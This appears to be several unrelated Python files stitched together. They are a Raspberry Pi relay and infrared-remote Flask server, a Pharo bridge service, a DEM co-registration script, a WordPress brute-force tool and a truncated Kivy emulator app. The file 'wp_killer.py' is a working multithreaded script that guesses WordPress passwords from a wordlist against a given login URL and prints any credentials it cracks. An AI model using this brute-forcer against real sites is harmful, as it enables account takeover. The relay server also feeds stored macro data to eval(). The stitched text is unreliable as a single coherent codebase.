jsonify, make_response, render_template, json,\ request import flask_from_url import time import os import subprocess import fcntl from flask_socketio import SocketIO, emit from threading import Thread try: import piplates.RELAYplate as RELAY except: print("Warning: piplates controller could not be loaded") print("Warning: enabling TESTING mode") TESTING = True import testingRELAYplate as RELAY DEBUG = True LIRCD_CONF = '/etc/lirc/lircd.conf' REMOTE_CONF_DIR = 'remotes' MACRO_CONF_DIR = 'macros' PLATE_CONF_DIR = 'plates' LIRC_DEVICE = '/dev/lirc0' IP_ADDRESS = "0.0.0.0" PORT = 5000 REGISTER_ZEROCONF = True app = Flask(__name__) app.config.from_object(__name__) app.config.from_envvar('RASPI_IR_RELAY_SETTINGS', silent=True) socketio = SocketIO(app) if REGISTER_ZEROCONF: import socket try: from zeroconf import ServiceInfo, Zeroconf if socket.getfqdn() == socket.gethostname(): FQDN = socket.gethostname() + ".local" else: FQDN = socket.getfqdn() except ImportError: print("Couldn't import ZeroConf Services") REGISTER_ZEROCONF = False if REGISTER_ZEROCONF and IP_ADDRESS != "0.0.0.0": ZC_IP_ADDRESS = IP_ADDRESS else: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(('10.255.255.255', 0)) ZC_IP_ADDRESS = s.getsockname()[0] except Exception as ex: print(str(ex)) print("Unfortunately we weren't able to determine a local IP") print("address for Zeroconf registration. Please specify one") print("in the configuration file.") REGISTER_ZEROCONF = False irrecord_proc = None irrecord_sender_thread = None if not os.path.isabs(REMOTE_CONF_DIR): REMOTE_CONF_DIR = os.path.join( os.path.dirname(os.path.abspath(__file__)), REMOTE_CONF_DIR ) if not os.path.isabs(MACRO_CONF_DIR): MACRO_CONF_DIR = os.path.join( os.path.dirname(os.path.abspath(__file__)), MACRO_CONF_DIR ) if not os.path.isabs(PLATE_CONF_DIR): PLATE_CONF_DIR = os.path.join( os.path.dirname(os.path.abspath(__file__)), PLATE_CONF_DIR ) def get_list_of_relay_plates(): plates = [] i = 0 for plate in RELAY.relaysPresent: if plate == 1: plates.append(i) i += 1 return plates def setup_relay_plate_dir(): if not os.path.exists(PLATE_CONF_DIR): os.mkdir(PLATE_CONF_DIR) elif not os.path.isdir(PLATE_CONF_DIR): raise Exception("Incorrect PLATE_CONF_DIR configuration") def load_relay_plate_conf(plate_num): setup_relay_plate_dir() plate_fn = os.path.join(PLATE_CONF_DIR, "plate_{}.json".format(plate_num)) if not os.path.exists(plate_fn) or not os.path.isfile(plate_fn): plate_conf = {"name": "plate_{}".format(plate_num)} for relay in range(1, 8): plate_conf['relay_{}'.format(relay)] = 'relay_{}'.format(relay) else: with open(plate_fn, 'r') as f: plate_conf = json.load(f) return plate_conf def save_relay_plate_conf(plate_num, plate_conf): setup_relay_plate_dir() plate_fn = os.path.join(PLATE_CONF_DIR, "plate_{}.json".format(plate_num)) with open(plate_fn, 'w') as f: json.dump(plate_conf, f) def initial_relay_state(): initial_fn = os.path.join(PLATE_CONF_DIR, "initial_state.json") if not os.path.exists(initial_fn) or not os.path.isfile(initial_fn): return with open(initial_fn, 'r') as f: initial_state = json.load(f) for i_plate_conf in initial_state.items(): curr_state = get_state_of_relays_on_plate(int(i_plate_conf[0])) for relay in i_plate_conf[1].keys(): if i_plate_conf[1][relay] != curr_state[int(relay)]: toggle_state_of_relay(int(i_plate_conf[0]), int(relay)) def get_state_of_relays_on_plate(plate_num): if RELAY.getADDR(plate_num) != plate_num: raise Exception("Plate Number is invalid") status_num = RELAY.relaySTATE(plate_num) relay_status = {} relay_num = 0 while relay_num < 7: relay_num += 1 if status_num & 1 == 1: relay_status[relay_num] = 'on' else: relay_status[relay_num] = 'off' status_num = status_num >> 1 return relay_status def toggle_state_of_relay(plate_num, relay_num): RELAY.relayTOGGLE(plate_num, relay_num) relay_status = get_state_of_relays_on_plate(plate_num) return relay_status[relay_num] def toggle_leds_on_plate(plate_num): if plate_num not in get_list_of_relay_plates(): raise Exception("Plate Number is invalid") RELAY.toggleLED(plate_num) def setup_remote_conf_dir(): if not os.path.exists(REMOTE_CONF_DIR): os.mkdir(REMOTE_CONF_DIR) elif not os.path.isdir(REMOTE_CONF_DIR): raise Exception("Incorrect REMOTE_CONF_DIR configuration") def get_list_of_remotes(): setup_remote_conf_dir() remotes = [] for item in os.listdir(REMOTE_CONF_DIR): if '.conf' not in item: continue remotes.append(item.split('.conf')[0]) return remotes def get_list_of_buttons_for_irrecord(): proc = subprocess.Popen( ['irrecord', '--list-namespace'], stdout=subprocess.PIPE, stderr=subprocess.PIPE ) buttons, error = proc.communicate() if proc.returncode > 0: raise Exception(error) lb = [] for button in buttons.decode('ascii', 'ignore').split('\n'): if button == '': continue lb.append(button.strip()) return lb def generate_lircd_conf(): with open(LIRCD_CONF, 'w') as f: for remote in get_list_of_remotes(): f.write( 'include "{}"\n'.format( os.path.join( REMOTE_CONF_DIR, '{}.conf'.format(remote) ) ) ) def irrecord_output_sender(): global irrecord_proc while True: if irrecord_proc is None: time.sleep(1) continue try: data = irrecord_proc.stdout.read() except IOError: time.sleep(1) continue print("Read data from irrecord stdout: {}".format(data)) socketio.emit('irrecord output', {'data': data}, namespace='/irrecord') def start_irrecord(remote): global irrecord_proc global irrecord_sender_thread if irrecord_sender_thread is None: irrecord_sender_thread = Thread(target=irrecord_output_sender) irrecord_sender_thread.daemon = True irrecord_sender_thread.start() pwd = os.getcwd() os.chdir(REMOTE_CONF_DIR) irrecord_proc = subprocess.Popen( ['irrecord', '-d', LIRC_DEVICE, remote], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) fcntl.fcntl(irrecord_proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK) os.chdir(pwd) def send_irrecord_button(button): global irrecord_proc if irrecord_proc is None: raise Exception('irrecord not running') irrecord_proc.stdin.write("{}\n".format(button)) irrecord_proc.stdin.flush() def set_remote_definition(remote_json, remote_name=None): setup_remote_conf_dir() ds_name = remote_json.keys()[0] if remote_name is None: remote_name = ds_name remote_fn = "{}.conf".format(remote_name) with open(os.path.join(REMOTE_CONF_DIR, remote_fn), 'w') as f: for line in remote_json[ds_name].split('\n'): if 'begin remote' in line: named = False if 'name' in line: line = '\tname {}\n'.format(remote_name) named = True if 'begin codes' in line and not named: f.write('\tname {}\n'.format(remote_name)) if 'end remote' in line: f.write('{}\n'.format(line)) break f.write('{}\n'.format(line)) generate_lircd_conf() def remove_remote_definition(remote_name): setup_remote_conf_dir() os.remove(os.path.join( REMOTE_CONF_DIR, "{}.conf".format(remote_name) )) generate_lircd_conf() def get_list_of_remote_buttons(remote_name): conf_file = os.path.join(REMOTE_CONF_DIR, "{}.conf".format(remote_name)) buttons = [] namespace_buttons = get_list_of_buttons_for_irrecord() with open(conf_file, 'r') as f: started_codes = False started_raw_codes = False for line in f: if 'begin codes' in line: started_codes = True continue if 'begin raw_codes' in line: started_raw_codes = True continue if not started_codes and not started_raw_codes: continue if 'end codes' in line or 'end raw_codes' in line: break if started_codes: line = line.strip() if '#' in line: line, comment = line.split('#', 1) line = line.split()[0] else: line = line.split()[0] comment = line if started_raw_codes: line = line.strip() if 'name' not in line: continue if '#' in line: line, comment = line.split('#', 1) line = line.split()[1] else: line = line.split()[1] comment = line button = line.strip() comment = comment.strip() if button not in namespace_buttons: continue if comment in namespace_buttons: comment = comment[4:].title() buttons.append([button, comment]) else: raise Exception("Malformed remote configuration") return buttons def press_ir_button(remote, button): cmd = subprocess.Popen( ['irsend', 'SEND_ONCE', remote, button], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = cmd.communicate() if len(stderr) > 0 or cmd.returncode > 0: raise Exception(stderr) def setup_macro_conf_dir(): if not os.path.exists(MACRO_CONF_DIR): os.mkdir(MACRO_CONF_DIR) elif not os.path.isdir(MACRO_CONF_DIR): raise Exception("Incorrect MACRO_CONF_DIR configuration") def get_list_of_macros(): setup_macro_conf_dir() macros = [] for item in os.listdir(MACRO_CONF_DIR): if '.json' not in item: continue macros.append(item.split('.json')[0]) return macros def get_macro_definition(macro_name): macrolist = get_list_of_macros() macro_fn = "{}.json".format(macro_name) if macro_name not in macrolist: raise Exception("Macro undefined") with open(os.path.join(MACRO_CONF_DIR, macro_fn), 'r') as f: return json.load(f) def set_macro_definition(macro_json, macro_name=None): setup_macro_conf_dir() ds_name = macro_json.keys()[0] if macro_name is None: macro_name = ds_name macro_fn = "{}.json".format(macro_name) with open(os.path.join(MACRO_CONF_DIR, macro_fn), 'w') as f: json.dump(macro_json[ds_name], f) def remove_macro_definition(macro_name): setup_macro_conf_dir() os.remove(os.path.join( MACRO_CONF_DIR, "{}.json".format(macro_name) )) @app.route('/') def home(): return render_template('home.html') @app.route('/wss') def websockets(): return render_template('wss.html') @app.route('/api/') def api_versions(): return jsonify(v1=url_for('api_v1')) @app.route('/api/v1/') def api_v1(): endpoints = {} endpoints[url_for('api_v1_plate')] = 'plate' endpoints[url_for('api_v1_ir')] = 'ir' return jsonify(**endpoints) @app.route('/api/v1/pause') def pause(): pause_time = request.args.get('time') if pause_time is None: pause_time = 1 time.sleep(pause_time) return jsonify(status="ok") @app.route('/api/v1/plate/') def api_v1_plate(): endpoints = {} for relay_plate in get_list_of_relay_plates(): endpoints[url_for( 'api_v1_plate_num', plate_num=relay_plate )] = load_relay_plate_conf(relay_plate)['name'] return jsonify(**endpoints) @app.route('/api/v1/plate/<int:plate_num>/') def api_v1_plate_num(plate_num): try: relay_status = get_state_of_relays_on_plate(plate_num) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) plate_conf = load_relay_plate_conf(plate_num) plate_name = request.args.get('name') if plate_name is None: plate_name = plate_conf['name'] else: plate_conf['name'] = plate_name save_relay_plate_conf(plate_num, plate_conf) endpoints = {'name': plate_name} for relay_num, state in relay_status.items(): endpoints[url_for( 'api_v1_plate_num_relay_set', plate_num=plate_num, relay_num=relay_num )] = { 'state': state, 'name': plate_conf['relay_{}'.format(relay_num)] } return jsonify(**endpoints) @app.route('/api/v1/plate/<int:plate_num>/toggleleds') def api_v1_plate_num_toggle_leds(plate_num): try: toggle_leds_on_plate(plate_num) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) return jsonify(status="ok") @app.route('/api/v1/plate/<int:plate_num>/<int:relay_num>/') @app.route('/api/v1/plate/<int:plate_num>/<int:relay_num>/<state>') def api_v1_plate_num_relay_set(plate_num, relay_num, state=None): try: relay_status = get_state_of_relays_on_plate(plate_num) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) if relay_num not in relay_status.keys(): return make_response(jsonify(err="Relay is invalid"), 403) if state is None: state = request.args.get('state') if state not in ['off', 'on', 'toggle', None]: return make_response(jsonify(err="State is invalid"), 403) plate_conf = load_relay_plate_conf(plate_num) relay_name = request.args.get('name') if relay_name is None: relay_name = plate_conf['relay_{}'.format(relay_num)] else: plate_conf['relay_{}'.format(relay_num)] = relay_name save_relay_plate_conf(plate_num, plate_conf) curr_relay_state = relay_status[relay_num] if ((curr_relay_state == 'on' and state == 'off') or (curr_relay_state == 'off' and state == 'on') or state == 'toggle'): curr_relay_state = toggle_state_of_relay(plate_num, relay_num) return jsonify(state=curr_relay_state, name=relay_name) @app.route('/api/v1/ir/') def api_v1_ir(): endpoints = {} endpoints[url_for('api_v1_ir_macro')] = 'macro' endpoints[url_for('api_v1_ir_remote')] = 'remote' endpoints[url_for('api_v1_irrecord_buttons')] = 'irrecord_buttons' return jsonify(**endpoints) @app.route('/api/v1/ir/irrecord_buttons') def api_v1_irrecord_buttons(): try: buttons = get_list_of_buttons_for_irrecord() except Exception as ex: return make_response(jsonify(err=str(ex)), 403) return jsonify(buttons=buttons) @app.route('/api/v1/ir/macro/', methods=['GET', 'PUT']) def api_v1_ir_macro(): if request.method == 'PUT': try: set_macro_definition(request.get_json()) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) try: macrolist = get_list_of_macros() except Exception as ex: return make_response(jsonify(err=str(ex)), 403) macros = {} for macro in macrolist: macros[url_for( 'api_v1_ir_macro_name', macro_name=macro )] = macro return jsonify(**macros) @app.route('/api/v1/ir/macro/<macro_name>/', methods=['GET', 'POST', 'DELETE']) @app.route('/api/v1/ir/macro/<macro_name>/<state>') def api_v1_ir_macro_name(macro_name, state=None): if request.method == 'POST': try: set_macro_definition(request.get_json(), macro_name) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) try: macro = get_macro_definition(macro_name) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) if request.method == 'DELETE': try: remove_macro_definition(macro_name) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) return jsonify(status="ok") if state is None: state = request.args.get('state') if state not in ['pressed', 'on', None]: return make_response(jsonify(err="State is invalid"), 403) if state in ['pressed', 'on']: for url in macro: func, args = flask_from_url.route_from(url) func = eval(func) func(**args) formatted_macro = {} formatted_macro[macro_name] = macro return jsonify(**formatted_macro) @app.route('/api/v1/ir/remote/', methods=['GET', 'PUT']) def api_v1_ir_remote(): if request.method == 'PUT': try: set_remote_definition(request.get_json()) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) try: remotelist = get_list_of_remotes() except Exception as ex: return make_response(jsonify(err=str(ex)), 403) remotes = {} for remote in remotelist: remotes[url_for( 'api_v1_ir_remote_remote_name', remote=remote )] = remote return jsonify(**remotes) @app.route('/api/v1/ir/remote/<remote>/', methods=['GET', 'POST', 'DELETE']) def api_v1_ir_remote_remote_name(remote): if request.method == 'POST': try: set_remote_definition(request.get_json(), remote) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) try: buttonlist = get_list_of_remote_buttons(remote) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) if request.method == 'DELETE': try: remove_remote_definition(remote) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) return jsonify(status="ok") buttons = {} for button in buttonlist: buttons[url_for( 'api_v1_ir_remote_remote_button', remote=remote, button=button[0] )] = {'button': button[0], 'name': button[1]} buttons['name'] = remote return jsonify(**buttons) @app.route('/api/v1/ir/remote/<remote>/<button>/') @app.route('/api/v1/ir/remote/<remote>/<button>/<state>') def api_v1_ir_remote_remote_button(remote, button, state=None): try: buttonlist = get_list_of_remote_buttons(remote) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) if button not in [x[0] for x in buttonlist]: return make_response(jsonify(err="Button not defined"), 403) if state is None: state = request.args.get('state') if state not in ['pressed', 'on', None]: return make_response(jsonify(err="State is invalid"), 403) if state in ['pressed', 'on']: try: press_ir_button(remote, button) except Exception as ex: return make_response(jsonify(err=str(ex)), 403) button_status = {} for x in buttonlist: if x[0] == button: button_status['button'] = x[0] button_status['name'] = x[1] return jsonify(**button_status) @socketio.on('start irrecord', namespace='/irrecord') def wss_start_irrecord(message): start_irrecord(message['remote']) print(message) emit('irrecord output', { 'data': 'Starting irrecord for {}'.format( message['remote'] ) }) @socketio.on('send irrecord button', namespace='/irrecord') def wss_send_button(message): send_irrecord_button(message['button']) emit('irrecord output', { 'data': message['button'] }) if __name__ == '__main__': initial_relay_state() if REGISTER_ZEROCONF: info = ServiceInfo("_http._tcp.local.", socket.gethostname() + "._http._tcp.local.", address=socket.inet_aton(ZC_IP_ADDRESS), port=PORT, properties={'path': '/', 'api-type': 'raspi-ir-relay'}, server=FQDN) zeroconf = Zeroconf() try: zeroconf.register_service(info) except Exception as ex: print(ex) socketio.run(app, host=IP_ADDRESS, port=PORT) if REGISTER_ZEROCONF: try: zeroconf.unregister_service(info) zeroconf.close() except Exception as ex: print(ex)
flask_platform.py
from flask import Flask, request import http.client import json import threading from PythonBridge import bridge_globals, json_encoder, bridge_utils import sys import logging import requests class FlaskMsgService: def __init__(self, port, pharo_port, feed_callback): self.serializer = json_encoder.JsonSerializer() log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) self.thread = None self.port = port self.pharo_port = pharo_port self.feed_callback = feed_callback self.app = Flask('PythonBridge') self.app.use_reloader=False self.session = requests.Session() self.session.trust_env = True @self.app.route("/ENQUEUE", methods=["POST"]) def eval_expression(): data = request.get_json(force=True) self.feed_callback(data) return "{}" @self.app.route("/IS_ALIVE", methods=["POST"]) def status_endpoint(): return "{}" def addMapping(self, key_type, mapping_function): json_encoder.addMapping(key_type, mapping_function) def _start(self): try: self.app.run(port=self.port) except OSError as err: bridge_globals.logger.log('Critical Error:' + str(err)) exit(42) def start(self): self.thread = threading.Thread(target=self._start, args=()) self.thread.daemon = True self.thread.start() def is_running(self): return self.thread != None def stop(self): pass def send_async_message(self, msg): self.send_sync_message(msg) def send_sync_message(self, msg): msg['__sync'] = bridge_utils.random_str() bridge_globals.logger.log("SYNC_MSG: " + json.dumps(msg)) response = self.session.post( 'http://localhost:' + str(self.pharo_port) + '/' + msg['type'], data=json.dumps(msg), headers={'content-type': 'application/json'}, allow_redirects=True).content.decode('utf-8') bridge_globals.logger.log("SYNC_ANS: " + response) return json.loads(response) def build_service(port, pharo_port, feed_callback): return FlaskMsgService(port, pharo_port, feed_callback)
dem_coregistration.py
#!/usr/bin/env python # Filename: dem_coregistration """ introduction: dem co-registration using demcoreg, install it and its dependencies: git clone https://github.com/dshean/imview.git pip install -e imview git clone https://github.com/dshean/pygeotools.git pip install -e pygeotools git clone https://github.com/dshean/demcoreg.git pip install -e demcoreg authors: Huang Lingcao email:huanglingcao@gmail.com add time: 01 March, 2021 """ import os, sys from optparse import OptionParser deeplabforRS = os.path.expanduser('~/codes/PycharmProjects/DeeplabforRS') sys.path.insert(0, deeplabforRS) import basic_src.io_function as io_function import basic_src.basic as basic import raster_io from multiprocessing import Process dem_dem_align = os.path.expanduser('~/codes/github_public_repositories/demcoreg/demcoreg/dem_align.py') # use psutil to check available memory. import psutil import time # check the resource used by python # import resource # resource.getrusage(resource.RUSAGE_SELF) def choose_reference_dem(dem_list, dem_valid_per_txt): if dem_valid_per_txt is None: raise ValueError('NO information of valid percentage of DEMs, cannot choose a reference DEM') with open(dem_valid_per_txt, 'r') as f_obj: tif_valid_per_list = [line.strip().split() for line in f_obj.readlines()] tif_higest_per = None per_max = 0 for tif, per in tif_valid_per_list: if float(per) > per_max: per_max = float(per) tif_higest_per = tif for dem_tif in dem_list: if tif_higest_per in dem_tif: return dem_tif return None def check_coreg_results(dem_tif, save_dir): dem_align = os.path.join(save_dir, 'dem_coreg', os.path.basename(io_function.get_name_by_adding_tail(dem_tif, 'coreg'))) if os.path.isfile(dem_align): return True return False def check_align_folder(dem_tif): # by default, dem_align.py save the results to where dem_tif is res_dir = os.path.dirname(dem_tif) align_folder = os.path.splitext(os.path.basename(dem_tif))[0] + '_dem_align' align_dir = os.path.join(res_dir,align_folder) # after dem_align.py usually have 9 files align_outputs = io_function.get_file_list_by_pattern(align_dir,'*') # print(align_outputs) return align_outputs def move_align_results(ref_dem, dem_tif, save_dir): coreg_save_dir = os.path.join(save_dir, 'dem_coreg') if os.path.isdir(coreg_save_dir) is False: io_function.mkdir(coreg_save_dir) align_outputs = check_align_folder(dem_tif) if len(align_outputs) < 9: raise ValueError('the output of dem_align.py is less than 9 files') dem_align = os.path.join(coreg_save_dir, os.path.basename(io_function.get_name_by_adding_tail(dem_tif, 'coreg'))) # align DEM and a filt version, which one should I use? what filter they apply? # visually check one results (Banks east) , a the same location, align DEM and a filt one have exact values, # but the filt version have more nodata. Let's use the filt version. # the nodata pixels usually are water pixels, but also some inside the thaw slumps align_filt = [out for out in align_outputs if out.endswith('align_filt.tif')][0] io_function.move_file_to_dst(align_filt,dem_align, overwrite=True) # copy reference dem if necessary ref_dem_copy = os.path.join(coreg_save_dir, os.path.basename(ref_dem)) if os.path.isfile(ref_dem_copy) is False: io_function.copy_file_to_dst(ref_dem,ref_dem_copy) # move the elevation difference? ele_diff_folder = os.path.join(save_dir,'dem_diff_from_demcoreg') if os.path.isdir(ele_diff_folder) is False: io_function.mkdir(ele_diff_folder) dem_diff_filt = [out for out in align_outputs if out.endswith('align_diff_filt.tif')][0] io_function.movefiletodir(dem_diff_filt,ele_diff_folder, overwrite=True) coreg_png_plot_folder = os.path.join(save_dir,'demcoreg_png_plot') if os.path.isdir(coreg_png_plot_folder): io_function.mkdir(coreg_png_plot_folder) coreg_pngs = [out for out in align_outputs if out.endswith('.png')] for png in coreg_pngs: io_function.movefiletodir(png, coreg_png_plot_folder, overwrite=True) return True # def co_registration_parallel(ref_dem, dem_list, save_dir, process_num): # print('ref_dem', ref_dem) # print('source dem:') # for dem_tif in dem_list: # print(dem_tif) # # # dem_align.py requires large memory, for example, a region of 50000 by 50000 pixels, may requires more than 110 GB memory. # # # parallel --progress --delay 10 -j 14 dem_align.py ${ref} {} ::: $(ls *_dem.tif | grep -v 2012) # commond_str = 'parallel --progress --delay 5 -j %d %s %s'%(process_num, dem_dem_align ,ref_dem) # commond_str += ' {} ::: ' + ' '.join(dem_list) # print(commond_str) # os.system(commond_str) # move results to another folder def co_registration_one_dem(ref_dem, dem_tif, save_dir): if check_coreg_results(dem_tif,save_dir): basic.outputlogMessage('co-registeration results for %s exists, skip'%dem_tif) return 0 align_outputs = check_align_folder(dem_tif) if len(align_outputs) >= 9: basic.outputlogMessage('%s has been co-registered, skip'%dem_tif) else: commond_str = dem_dem_align + ' ' + ref_dem + ' ' + dem_tif basic.outputlogMessage(commond_str) res = os.system(commond_str) if res != 0: sys.exit(1) return move_align_results(ref_dem, dem_tif, save_dir) def co_registration_multi_process(ref_dem, dem_list, save_dir, process_num): print('ref_dem', ref_dem) print('source dem:') for dem_tif in dem_list: print(dem_tif) sub_tasks = [] for dem_tif in dem_list: height, width, band_num, daet_type = raster_io.get_height_width_bandnum_dtype(dem_tif) # estimate memory need need_memory = height*width*4*12 # usually, each pixel need 4 Bytes (float), dem_align.py need more than memory 12 times of file size avai_memory = psutil.virtual_memory().available while need_memory > avai_memory: print('waiting more available memory, need: %.4f GB, available: %.4f GB'%(need_memory/(1000*1000*1000), avai_memory/(1000*1000*1000))) time.sleep(10) avai_memory = psutil.virtual_memory().available while basic.alive_process_count(sub_tasks) >= process_num: time.sleep(10) sub_process = Process(target=co_registration_one_dem, args=(ref_dem, dem_tif,save_dir)) sub_process.start() sub_tasks.append(sub_process) time.sleep(1) if sub_process.exitcode is None: # even the function has return, sub_process.alive still true for now time.sleep(10) # wait 10 seconds if sub_process.exitcode is not None and sub_process.exitcode != 0: sys.exit(1) def main(options, args): save_dir = options.save_dir dem_dir_or_txt = args[0] ref_dem = options.ref_dem dem_valid_per_txt = options.dem_valid_per_txt process_num = options.process_num if os.path.isfile(dem_dir_or_txt): dem_list = io_function.read_list_from_txt(dem_dir_or_txt) else: dem_list = io_function.get_file_list_by_ext('.tif', dem_dir_or_txt, bsub_folder=False) if dem_valid_per_txt is None: dem_valid_per_txt = os.path.join(dem_dir_or_txt,'dem_valid_percent.txt') dem_count = len(dem_list) if dem_count < 1: raise ValueError('No input dem files in %s' % dem_dir_or_txt) if ref_dem is None: ref_dem = choose_reference_dem(dem_list, dem_valid_per_txt) if ref_dem is None: raise ValueError('Cannot find a reference DEM') if ref_dem in dem_list: dem_list.remove(ref_dem) # co_registration_parallel(ref_dem,dem_list,save_dir,process_num) co_registration_multi_process(ref_dem, dem_list, save_dir, process_num) if __name__ == '__main__': usage = "usage: %prog [options] dem_tif_dir or dem_list_txt " parser = OptionParser(usage=usage, version="1.0 2020-3-1") parser.description = 'Introduction: co-registration for multi-temporal DEMs ' parser.add_option("-d", "--save_dir", action="store", dest="save_dir", default='./', help="the folder to save results") parser.add_option("", "--process_num", action="store", dest="process_num", type=int, default=4, help="number of processes") parser.add_option("-r", "--ref_dem", action="store", dest="ref_dem", help="the reference DEM, if not set, it will select with the most coverage") parser.add_option("-p", "--dem_valid_per_txt", action="store", dest="dem_valid_per_txt", help="a txt file storing the valid percentage of all the DEM") (options, args) = parser.parse_args() # print(options.create_mosaic) if len(sys.argv) < 2 or len(args) < 1: parser.print_help() sys.exit(2) main(options, args)
wp_killer.py
from bhp3_class.web import get_words from collections import deque from io import BytesIO from lxml import etree import requests import sys import threading import time EXTENSIONS = ['.php', '.bak', '.orig', '.inc'] SUCCESS = 'Welcome to WordPress!' WORDLIST = '/mydownloads/cain.txt' def get_params(content): params = dict() parser = etree.HTMLParser() tree = etree.parse(BytesIO(content), parser=parser) for elem in tree.findall('//input'): name = elem.get('name') if name: params[name] = elem.get('value', None) return params class Bruter: def __init__(self, username, url): self.username = username self.url = url self.found = False print(f'\nBrute Force Attack beginning on {url}.\n') print("Finished setup; username = %s\n" % username) def run_bruteforce(self, passwords): for _ in range(10): t = threading.Thread(target=self.web_bruter, args=(passwords,)) t.start() def web_bruter(self, passwords): session = requests.Session() while True: time.sleep(5) try: brute = passwords.popleft() except IndexError: print('Thread quits with no match.') sys.exit() print(f'Trying username/password {self.username}/{brute:<10}') resp0 = session.get(self.url) params = get_params(resp0.content) params['log'] = self.username params['pwd'] = brute resp1 = session.post(self.url, data=params) if SUCCESS in resp1.content.decode(): self.found = True print(f"\nBruteforcing successful.") print("Username is %s" % self.username) print("Password is %s\n" % brute) passwords.clear() print('done: now cleaning up.') if __name__ == '__main__': username = input('Enter username: ') url = input("input WP url: ") words = get_words(WORDLIST) b = Bruter(username, url) b.run_bruteforce(deque(words))
main.py
import os import sys # os.system('set DEBUG=1') # print("setting debugger to true for auto reload") from kivy.storage.jsonstore import JsonStore from kivy.uix.button import Button from kivy.uix.image import AsyncImage from kivy.uix.scrollview import ScrollView from kivymd.list import MDList, OneLineAvatarIconListItem, ILeftBody original_argv = sys.argv import traceback from fnmatch import fnmatch from functools import partial from importlib import reload from logging import Logger from os.path import join, realpath from threading import Thread from kivy.app import App from kivy.clock import mainthread, Clock from kivy.core.window import Window from kivy.factory import Factory from kivy.lang import Builder from kivy.properties import ObjectProperty, NumericProperty, StringProperty, ListProperty from kivy.resources import resource_add_path, resource_remove_path from kivy.uix.floatlayout import FloatLayout from kivy.uix.screenmanager import Screen from monotonic import monotonic from kivy.uix.scrollview import ScrollView from kivymd.theming import ThemeManager from plyer import filechooser BASE_DIR = os.path.realpath(__file__) json_path = BASE_DIR.split("\\")[:-1] history_path = os.path.join("\\".join(json_path), "history.json") class EmulatorScreen(Screen): pass class AvatarSampleWidget(ILeftBody, AsyncImage): pass class HistoryItem(OneLineAvatarIconListItem): def __init_(self,**kwargs): super(HistoryItem,self).__init__(**kwargs) def on_press(self): print("yeah",self.text) App.get_running_app().file_name = self.text App.get_running_app().theme_cls.theme_style = 'Light' Window.size = (300, 650) Window.borderless = True App.get_running_app().clear() App.get_running_app().root.ids.screen_manager.current = "emulator_screen" class HistoryScreen(Screen): def build_screen(self): history = JsonStore(history_path) scrollview = ScrollView(do_scroll_x = False) md_list = MDList() scrollview.add_widget(md_list) for i in history.keys(): item = HistoryItem(text=str(i)) item.add_widget(AvatarSampleWidget(source="./assets/kivy-icon-128.png")) md_list.add_widget(item) print("building screen for history") self.add_widget(scrollview) class EmuInterface(FloatLayout): pass def toast(text): from kivymd.toast.kivytoast import toast toast(text) class KivyEmu(App): theme_cls = ThemeManager() theme_cls.primary_palette = 'Indigo' theme_cls.accent_palette = 'Indigo' theme_cls.theme_style = 'Dark' Window.size = (300, 650) filename = None class_name = None selection = ListProperty([]) bs_menu_1 = None # reloader = ReloaderApp() AUTORELOADER_PATHS = [ (".", {"recursive": True}), ] AUTORELOADER_IGNORE_PATTERNS = [ "*.pyc", "*__pycache__*" ] KV_FILES = [ ] CLASSES = {} def get_root(self): """ Return a root widget, that will contains your application. It should not be your application widget itself, as it may be destroyed and recreated from scratch when reloading. By default, it returns a RelativeLayout, but it could be a Viewport. """ return Factory.RelativeLayout() def build_app(self, first=False): """Must return your application widget. If `first` is set, it means that will be your first time ever that the application is built. Act according to it. """ raise NotImplemented() def unload_app_dependencies(self): """ Called when all the application dependencies must be unloaded. Usually happen before a reload """ for path in self.KV_FILES: path = realpath(path) Builder.unload_file(path) for name, module in self.CLASSES.items(): Factory.unregister(name) def load_app_dependencies(self): """ Load all the application dependencies. This is called before rebuild. """ for path in self.KV_FILES: path = realpath(path) Builder.load_file(path) for name, module in self.CLASSES.items(): Factory.register(name, module=module) def rebuild(self, *largs, **kwargs): print("rebuildig application") self.emulate_file(self.filename) print("done reloading") # Logger.debug("{}: Rebuild the application".format(self.appname)) # first = kwargs.get("first", False) # try: # if not first: # self.unload_app_dependencies() # self.load_app_dependencies() # self.set_widget(None) # # self.start_emulation() # except Exception as e: # pass # self.approot = self.build_app() # self.root.ids.emulator_screen = # self.set_widget(self.approot) # self.apply_state(self.state) # except Exception as e: # import traceback # Logger.exception("{}: Error when building app".format(self.appname)) # self.set_error(repr(e), traceback.format_exc()) # if not self.DEBUG and self.RAISE_ERROR: # raise @mainthread def set_error(self, exc, tb=None): print(tb) from kivy.core.window import Window lbl = Factory.Label( text_size=(Window.width - 100, None), text="{}\n\n{}".format(exc, tb or "")) self.set_widget(lbl) def bind_key(self, key, callback): """ Bind a key (keycode) to a callback (cannot be unbind) """ from kivy.core.window import Window def _on_keyboard(window, keycode, *largs): if key == keycode: return callback() Window.bind(on_keyboard=_on_keyboard) @property def appname(self): """ Return the name of the application class """ return self.__class__.__name__ def enable_autoreload(self): """ Enable autoreload manually. It is activated automatically if "DEBUG" exists in environ. It requires the `watchdog` module. """ try: from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler except ImportError: Logger.warn("{}: Autoreloader is missing watchdog".format(self.appname)) return # Logger.info(" Autoreloader activated") print("Autoreload activated") rootpath = self.get_root_path() # print("this is the root path",rootpath) self.w_handler = handler = FileSystemEventHandler() handler.dispatch = self._reload_from_watchdog self._observer = observer = Observer() for path in self.AUTORELOADER_PATHS: # print(path,"paths dey") options = {"recursive": True} if isinstance(path, (tuple, list)): # print("iii") path, options = path observer.schedule( handler, join(rootpath, path), **options) observer.start() @mainthread 